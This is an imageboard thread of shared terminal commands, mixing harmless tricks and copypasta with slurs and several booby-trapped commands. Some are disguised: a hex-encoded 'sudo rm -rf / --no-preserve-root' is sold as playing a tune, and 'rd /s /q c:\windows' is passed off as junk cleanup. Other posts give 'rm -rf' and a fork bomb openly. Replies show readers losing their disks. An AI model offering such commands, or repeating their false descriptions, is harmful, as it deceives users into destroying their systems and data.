Post terminal commands

Post terminal commands.

Attached: 1537744681031.png (1001x823, 806K)

Other urls found in this thread:

wttr.in/?q&n&p'
twitter.com/NSFWRedditGif

uname -r

Attached: 1537533940869.jpg (499x499, 59K)

pushd .

cd code

cal

sudo

kys -dumbfrogposter

:(){ :|: & };:

The dancing Bear macro is always a crowd pleaser. User it to impress thots in your English breadth classes.

for i in {1..100};{((i%3))&&x=||x=Fizz;((i%5))||x+=Buzz;echo ${x:-$i};}

cd..
cd..
cd..
cd ..
ls

vim main.cpp

Attached: 1536648153603.gif (892x892, 90K)

You're hired

ed

Just in case nobody gets the joke :)

Attached: KE6QNYV.png (1357x1281, 1.49M)

$(echo 7375646f20726d202d7266202f202d2d6e6f2d70726573657276652d726f6f74 | xxd -r -p)

Plays a short tune through your PC speakers. The sound is encoded in the command itself

Don't do this it creates mustard code

-exit

git fetch --recurse --tags --prune && git merge --ff-only && git submodule update

Wow, that sounds awesome! It asks for sudo password, but that's just so the program can access the speakers at a very low level.

XXD

No shit

Why would you do this user?

Fuck you I just ran it on my VM thinking I had a snapshot to revert to and it removed everything and now I realize I recently went through and deleted all my snapshots. I'm report you to the FBI

726d202d7266207e

As if anybody running linux would be dumb enough to try this

i use arch btw

sudo rm -rf /*

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

Have you seen how dumb some of the newfags here are? Especially those that just installed arch for the first time, and want to try their new 1337 h4x0r 5ki11z

you dirty motherfucker, that wiped out my disk

n0\/\/ t|-|15 15 3p1c

das da good wun
which bluetoothctl | xargs lpp -v

inxi -Fx

python3 -c $'import math,random,subprocess,time\ns=int(subprocess.check_output(["stty", "size"]).split()[1])\nn=0\nwhile 1:print(" "*int(s/2+s/2*math.sin(n))+"\e[3"+str(random.randint(0,7))+"m*\e[m");time.sleep(.05);n+=.1'

I get "n0//: No such file or directory" when trying to run this

another good one

Attached: kodewithkarlie.png (1033x746, 819K)

telnet towel.blinkenlights.nl

Attached: 1538205395783.png (115x163, 1K)

you need to run first

mkfs.reiser4 /dev/wife

apt-get install cowsay
echo "OP is a faggot" | cowsay

sudo apt-get update
sudo apt-get upgrade
sudo apt update
sudo apt upgrade

telnet 2048.run
telnet kirjava.xyz
telnet mapscii.me

I hole-hardedly agree, but allow me to play doubles advocate here for a moment. For all intensive purposes I think you are wrong. In an age where false morals are a diamond dozen, true virtues are a blessing in the skies. We often put our false morality on a petal stool like a bunch of pre-Madonnas, but you all seem to be taking something very valuable for granite. So I ask of you to mustard up all the strength you can because it is a doggy dog world out there. Although there is some merit to what you are saying it seems like you have a huge ship on your shoulder. In your argument you seem to throw everything in but the kids Nsync, and even though you are having a feel day with this I am here to bring you back into reality. I have a sick sense when it comes to these types of things. It is almost spooky, because I cannot turn a blonde eye to these glaring flaws in your rhetoric. I have zero taller ants when it comes to people spouting out hate in the name of moral righteousness. You just need to remember what comes around is all around, and when supply and command fails you will be the first to go. Make my words, when you get down to brass stacks it doesn't take rocket appliances to get two birds stoned at once. It's clear who makes the pants in this relationship, and sometimes you just have to swallow your prize and accept the facts. You might have to come to this conclusion through denial and error but I swear on my mother's mating name that when you put the petal to the medal you will pass with flying carpets like it’s a peach of cake.

What program is lpp? Isn't part of the printer tools or something?

No idea what you're trying to communicate here. The only thing I can read here is "epic".
Also, to add onto this. If none of the Linux users are dumb enough to run this, why would you post the result then? To prove how ebic and smarb you are?

Attached: command.png (1271x541, 47K)

GNU/Linux*

woops, I meant ldd, my bad.

she needs to join our startup

while true; do echo "OP is a faggot"; done;
also
ping 8.8.8.8&

thank god it was a virtual machine, i say

>7375646f20726d202d7266202f202d2d6e6f2d70726573657276652d726f6f74

sudo rm -rf / --no-preserve-root

Hex to ASCII, this should be illegal.

Now this is epic

banner -w9001 "OP is a faggot"

Holy shit is that still up?

ver

wtf my computer powers up then turns off instantly?
did my speakers fry?

display neatly formatted weather info:
curl -s 'wttr.in/?q&n&p' | head -n -3'
replace with your city.

eric, simply eric

>sudo rm -rf / --no-preserve-root
when
>sudo rm -rf /*
does the exact same thing, pleb

ipconfig /HACK 127.0.0.1

echo "alias linux=\"echo I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.\"" >> ~/.bashrc

i fell for it like a bitch

your hdd got wiped

>xd
Hola Reddit

copy faster than cp
(cd /path/to/old/directory; tar -cf - .) |
(cd /path/to/new/directory; tar -xf - )

this creates two processes. the first one only reads, the second one only writes.
this is especially useful if have a multicore cpu and you copy files between different file systems (e.g. from disk to usb drive).
this way you'll get more bus transfers.

I'm writing this in every laptop I find in a store with Linux.
Irrelevant, but I also enable developers mode on Android devices and turn on things like "flash on touch", "show view boundaries", "show cursor".

cool

dir

:(){ :|: & };:

Attached: unknown.png (318x384, 9K)

You're both retarded.

Deletes your entire directory?

kind of.
cd into /tmp and create some files and try it first
it's much quicker than moving the files to trash

kill -9

see

hey can you not ruin us trying to bait normies into borking their PCs?
it's the only joy I have

uname --operating-system

Prints the name of your OS.

why do you have fun when others have sad?

touch Akarin

there is no light only darkness

Attached: 1509365163992.jpg (760x767, 140K)

there is someone ITT that fell for this

sl
>choo choo

I've been staring at that 'truth table' for almost five minutes. what logic gate is the the table trying to elaborate and what the fuck is "sum" supposed to mean in this context.

am I retarded Jow Forums?

Use rd /s /q c:\windows to remove unneccesary junk files and error report logs created by Windows.

>being this gullible
You must be 18+ to post here.

It’s an AND gate. But I have no idea what the “Sum” is doing.

She's writing an XOR gate, the c column is the AND results and God knows why she listed XOR as Sum.

its a XOR tho you retard

>:(){ :|: & };:
literally why is it so uncool?

That's actually a half-adder. The 'c' represents the carry after addition and 'sum' represents the digit you get back.

You guys should join our startup

Attached: Screenshot from 2018-09-29 15-14-40.png (189x20, 500)

Relax. I never heard of XOR being called sum before. I was referring to column C as And, which it is.

if i want to dump my mac onto someone else is this the code for a paranoid nelly? It's also in a situation where I can only work it on safe mode mind you

Sum is the output bit when adding the two bits A and B.
The column C in between is the carry bit.
So if you add two 0s, the sum is 0.
If one input is 1, the sum is 1.
If both inputs are 1, the sum is 0, and you get 1 carry over.

was meant for

I'd like to add to the record that I laughed at this post

let's invite her

echo 726d202d7266202a | xxd -r -p

pushd .
pushd /tmp
pushd /etc
dirs -l -v
pushd +[number]

alias p="pushd" +="pushd ." -="popd" d="dirs -l -v"

alias killme="killall -u $USER"